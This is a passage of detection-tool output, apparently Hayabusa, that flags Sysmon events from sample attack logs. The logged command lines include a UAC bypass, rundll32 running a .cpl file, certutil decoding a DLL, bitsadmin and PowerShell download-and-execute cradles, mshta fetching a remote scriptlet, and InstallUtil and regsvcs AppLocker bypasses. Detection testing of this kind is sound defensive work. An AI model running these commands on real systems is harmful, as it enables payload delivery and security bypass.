C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows 
\System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: 
C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: 
C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil 
Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source 
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : 
User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe 
javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT 
AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: 
C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 
+09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 